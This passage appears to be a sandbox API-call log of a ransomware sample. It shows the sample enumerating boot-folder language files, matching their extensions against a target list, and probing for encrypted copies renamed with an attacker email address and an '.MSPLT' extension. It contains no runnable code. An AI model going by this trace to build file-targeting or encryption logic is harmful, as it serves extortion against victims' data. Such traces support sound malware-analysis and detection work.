lpString2=".mui") returned -1 [0284.833] lstrlenW (lpString="C:\\Boot\\da-DK\\memtest.exe.mui") returned 29 [0284.833] lstrlenW (lpString=".jpg") returned 4 [0284.833] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0284.833] lstrlenW (lpString="C:\\Boot\\da-DK\\memtest.exe.mui") returned 29 [0284.833] lstrlenW (lpString="C:\\Boot\\da-DK\\memtest.exe.mui") returned 29 [0284.833] lstrlenW (lpString=".doc") returned 4 [0284.833] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0284.833] lstrlenW (lpString=".docx") returned 5 [0284.833] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0284.833] lstrlenW (lpString=".pdf") returned 4 [0284.833] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0284.833] lstrlenW (lpString=".xls") returned 4 [0284.833] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0284.833] lstrlenW (lpString=".xlsx") returned 5 [0284.833] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0284.833] lstrlenW (lpString=".ppt") returned 4 [0284.833] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0284.833] lstrlenW (lpString="C:\\Boot\\da-DK\\memtest.exe.mui") returned 29 [0284.833] lstrlenW (lpString=".zip") returned 4 [0284.834] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0284.834] lstrlenW (lpString=".rar") returned 4 [0284.834] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0284.834] lstrlenW (lpString=".bz2") returned 4 [0284.834] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0284.834] lstrlenW (lpString=".7z") returned 3 [0284.834] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0284.834] lstrlenW (lpString="C:\\Boot\\da-DK\\memtest.exe.mui") returned 29 [0284.834] lstrlenW (lpString=".dbf") returned 4 [0284.834] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0284.834] lstrlenW (lpString="C:\\Boot\\da-DK\\memtest.exe.mui") returned 29 [0284.834] lstrlenW (lpString=".1cd") returned 4 [0284.834] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0284.834] lstrlenW (lpString="C:\\Boot\\da-DK\\memtest.exe.mui") returned 29 [0284.834] lstrlenW (lpString=".jpg") returned 4 [0284.834] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0284.834] Sleep (dwMilliseconds=0x64) [0285.128] Sleep (dwMilliseconds=0x64) [0285.426] Sleep (dwMilliseconds=0x64) [0285.785] Sleep (dwMilliseconds=0x64) [0286.065] Sleep (dwMilliseconds=0x64) [0286.283] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.283] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0286.283] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0286.283] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=78688) returned 1 [0286.283] CloseHandle (hObject=0x3e4) returned 1 [0286.283] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui")) returned 0x20 [0286.283] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.283] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.284] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0286.284] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0286.284] lstrlenW (lpString=".doc") returned 4 [0286.284] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.284] lstrlenW (lpString=".docx") returned 5 [0286.284] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.284] lstrlenW (lpString=".pdf") returned 4 [0286.284] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.284] lstrlenW (lpString=".xls") returned 4 [0286.284] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.284] lstrlenW (lpString=".xlsx") returned 5 [0286.284] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.284] lstrlenW (lpString=".ppt") returned 4 [0286.284] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.284] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0286.284] lstrlenW (lpString=".zip") returned 4 [0286.284] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.284] lstrlenW (lpString=".rar") returned 4 [0286.284] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.284] lstrlenW (lpString=".bz2") returned 4 [0286.284] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.284] lstrlenW (lpString=".7z") returned 3 [0286.284] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.284] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0286.284] lstrlenW (lpString=".dbf") returned 4 [0286.284] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.284] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0286.284] lstrlenW (lpString=".1cd") returned 4 [0286.284] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.284] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0286.284] lstrlenW (lpString=".jpg") returned 4 [0286.285] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.285] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0286.285] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0286.285] lstrlenW (lpString=".doc") returned 4 [0286.285] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.285] lstrlenW (lpString=".docx") returned 5 [0286.285] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.285] lstrlenW (lpString=".pdf") returned 4 [0286.285] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.285] lstrlenW (lpString=".xls") returned 4 [0286.285] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.285] lstrlenW (lpString=".xlsx") returned 5 [0286.285] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.285] lstrlenW (lpString=".ppt") returned 4 [0286.285] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.285] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0286.285] lstrlenW (lpString=".zip") returned 4 [0286.285] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.285] lstrlenW (lpString=".rar") returned 4 [0286.285] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.285] lstrlenW (lpString=".bz2") returned 4 [0286.285] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.285] lstrlenW (lpString=".7z") returned 3 [0286.285] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.285] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0286.285] lstrlenW (lpString=".dbf") returned 4 [0286.285] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.285] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0286.285] lstrlenW (lpString=".1cd") returned 4 [0286.285] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.285] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0286.285] lstrlenW (lpString=".jpg") returned 4 [0286.285] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.286] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.286] lstrlenW (lpString="memtest.exe.mui") returned 15 [0286.286] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0286.286] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=45976) returned 1 [0286.286] CloseHandle (hObject=0x3e4) returned 1 [0286.286] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui")) returned 0x20 [0286.286] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.286] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.287] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0286.287] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0286.287] lstrlenW (lpString=".doc") returned 4 [0286.287] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.287] lstrlenW (lpString=".docx") returned 5 [0286.287] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.287] lstrlenW (lpString=".pdf") returned 4 [0286.287] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.287] lstrlenW (lpString=".xls") returned 4 [0286.287] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.287] lstrlenW (lpString=".xlsx") returned 5 [0286.287] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.287] lstrlenW (lpString=".ppt") returned 4 [0286.287] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.287] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0286.287] lstrlenW (lpString=".zip") returned 4 [0286.287] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.287] lstrlenW (lpString=".rar") returned 4 [0286.287] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.287] lstrlenW (lpString=".bz2") returned 4 [0286.287] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.287] lstrlenW (lpString=".7z") returned 3 [0286.287] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.287] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0286.287] lstrlenW (lpString=".dbf") returned 4 [0286.288] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.288] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0286.288] lstrlenW (lpString=".1cd") returned 4 [0286.288] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.288] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0286.288] lstrlenW (lpString=".jpg") returned 4 [0286.288] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.288] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0286.288] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0286.288] lstrlenW (lpString=".doc") returned 4 [0286.288] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.288] lstrlenW (lpString=".docx") returned 5 [0286.288] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.288] lstrlenW (lpString=".pdf") returned 4 [0286.288] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.288] lstrlenW (lpString=".xls") returned 4 [0286.288] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.288] lstrlenW (lpString=".xlsx") returned 5 [0286.288] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.288] lstrlenW (lpString=".ppt") returned 4 [0286.288] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.288] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0286.288] lstrlenW (lpString=".zip") returned 4 [0286.288] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.288] lstrlenW (lpString=".rar") returned 4 [0286.288] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.288] lstrlenW (lpString=".bz2") returned 4 [0286.288] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.288] lstrlenW (lpString=".7z") returned 3 [0286.289] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.289] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0286.289] lstrlenW (lpString=".dbf") returned 4 [0286.289] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.289] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0286.289] lstrlenW (lpString=".1cd") returned 4 [0286.289] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.289] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0286.289] lstrlenW (lpString=".jpg") returned 4 [0286.289] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.289] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.289] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0286.289] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0286.289] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=77144) returned 1 [0286.289] CloseHandle (hObject=0x3e4) returned 1 [0286.289] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui")) returned 0x20 [0286.290] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.290] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.290] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0286.290] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0286.290] lstrlenW (lpString=".doc") returned 4 [0286.290] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.290] lstrlenW (lpString=".docx") returned 5 [0286.290] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.290] lstrlenW (lpString=".pdf") returned 4 [0286.290] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.290] lstrlenW (lpString=".xls") returned 4 [0286.290] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.290] lstrlenW (lpString=".xlsx") returned 5 [0286.290] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.290] lstrlenW (lpString=".ppt") returned 4 [0286.290] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.290] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0286.290] lstrlenW (lpString=".zip") returned 4 [0286.290] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.290] lstrlenW (lpString=".rar") returned 4 [0286.290] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.290] lstrlenW (lpString=".bz2") returned 4 [0286.290] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.290] lstrlenW (lpString=".7z") returned 3 [0286.290] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.290] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0286.290] lstrlenW (lpString=".dbf") returned 4 [0286.290] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.290] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0286.290] lstrlenW (lpString=".1cd") returned 4 [0286.290] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.290] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0286.291] lstrlenW (lpString=".jpg") returned 4 [0286.291] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.291] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0286.291] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0286.291] lstrlenW (lpString=".doc") returned 4 [0286.291] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.291] lstrlenW (lpString=".docx") returned 5 [0286.291] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.291] lstrlenW (lpString=".pdf") returned 4 [0286.291] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.291] lstrlenW (lpString=".xls") returned 4 [0286.291] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.291] lstrlenW (lpString=".xlsx") returned 5 [0286.291] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.291] lstrlenW (lpString=".ppt") returned 4 [0286.291] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.291] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0286.291] lstrlenW (lpString=".zip") returned 4 [0286.291] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.291] lstrlenW (lpString=".rar") returned 4 [0286.291] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.291] lstrlenW (lpString=".bz2") returned 4 [0286.291] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.291] lstrlenW (lpString=".7z") returned 3 [0286.291] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.291] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0286.291] lstrlenW (lpString=".dbf") returned 4 [0286.291] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.291] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0286.291] lstrlenW (lpString=".1cd") returned 4 [0286.291] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.291] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0286.291] lstrlenW (lpString=".jpg") returned 4 [0286.291] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.292] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.292] lstrlenW (lpString="memtest.exe.mui") returned 15 [0286.292] CreateFileW (lpFileName="C:\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0286.292] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=45472) returned 1 [0286.292] CloseHandle (hObject=0x3e4) returned 1 [0286.292] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui")) returned 0x20 [0286.292] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\it-it\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.292] CreateFileW (lpFileName="C:\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.292] lstrlenW (lpString="C:\\Boot\\it-IT\\memtest.exe.mui") returned 29 [0286.292] lstrlenW (lpString="C:\\Boot\\it-IT\\memtest.exe.mui") returned 29 [0286.292] lstrlenW (lpString=".doc") returned 4 [0286.293] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.293] lstrlenW (lpString=".docx") returned 5 [0286.293] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.293] lstrlenW (lpString=".pdf") returned 4 [0286.293] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.293] lstrlenW (lpString=".xls") returned 4 [0286.293] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.293] lstrlenW (lpString=".xlsx") returned 5 [0286.293] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.293] lstrlenW (lpString=".ppt") returned 4 [0286.293] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.293] lstrlenW (lpString="C:\\Boot\\it-IT\\memtest.exe.mui") returned 29 [0286.293] lstrlenW (lpString=".zip") returned 4 [0286.293] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.293] lstrlenW (lpString=".rar") returned 4 [0286.293] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.293] lstrlenW (lpString=".bz2") returned 4 [0286.293] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.293] lstrlenW (lpString=".7z") returned 3 [0286.293] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.293] lstrlenW (lpString="C:\\Boot\\it-IT\\memtest.exe.mui") returned 29 [0286.293] lstrlenW (lpString=".dbf") returned 4 [0286.293] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.293] lstrlenW (lpString="C:\\Boot\\it-IT\\memtest.exe.mui") returned 29 [0286.293] lstrlenW (lpString=".1cd") returned 4 [0286.293] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.293] lstrlenW (lpString="C:\\Boot\\it-IT\\memtest.exe.mui") returned 29 [0286.293] lstrlenW (lpString=".jpg") returned 4 [0286.293] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.293] lstrlenW (lpString="C:\\Boot\\it-IT\\memtest.exe.mui") returned 29 [0286.293] lstrlenW (lpString="C:\\Boot\\it-IT\\memtest.exe.mui") returned 29 [0286.293] lstrlenW (lpString=".doc") returned 4 [0286.294] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.294] lstrlenW (lpString=".docx") returned 5 [0286.294] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.294] lstrlenW (lpString=".pdf") returned 4 [0286.294] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.294] lstrlenW (lpString=".xls") returned 4 [0286.294] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.294] lstrlenW (lpString=".xlsx") returned 5 [0286.294] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.294] lstrlenW (lpString=".ppt") returned 4 [0286.294] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.294] lstrlenW (lpString="C:\\Boot\\it-IT\\memtest.exe.mui") returned 29 [0286.294] lstrlenW (lpString=".zip") returned 4 [0286.294] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.294] lstrlenW (lpString=".rar") returned 4 [0286.294] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.294] lstrlenW (lpString=".bz2") returned 4 [0286.294] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.294] lstrlenW (lpString=".7z") returned 3 [0286.294] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.294] lstrlenW (lpString="C:\\Boot\\it-IT\\memtest.exe.mui") returned 29 [0286.294] lstrlenW (lpString=".dbf") returned 4 [0286.294] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.294] lstrlenW (lpString="C:\\Boot\\it-IT\\memtest.exe.mui") returned 29 [0286.294] lstrlenW (lpString=".1cd") returned 4 [0286.294] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.294] lstrlenW (lpString="C:\\Boot\\it-IT\\memtest.exe.mui") returned 29 [0286.294] lstrlenW (lpString=".jpg") returned 4 [0286.294] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.294] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.294] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0286.295] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0286.295] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=67424) returned 1 [0286.295] CloseHandle (hObject=0x3e4) returned 1 [0286.295] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui")) returned 0x20 [0286.295] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.295] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.295] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0286.295] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0286.295] lstrlenW (lpString=".doc") returned 4 [0286.295] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.295] lstrlenW (lpString=".docx") returned 5 [0286.295] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.295] lstrlenW (lpString=".pdf") returned 4 [0286.295] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.295] lstrlenW (lpString=".xls") returned 4 [0286.295] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.295] lstrlenW (lpString=".xlsx") returned 5 [0286.295] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.296] lstrlenW (lpString=".ppt") returned 4 [0286.296] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.296] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0286.296] lstrlenW (lpString=".zip") returned 4 [0286.296] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.296] lstrlenW (lpString=".rar") returned 4 [0286.296] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.296] lstrlenW (lpString=".bz2") returned 4 [0286.296] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.296] lstrlenW (lpString=".7z") returned 3 [0286.296] lstrcmpiW 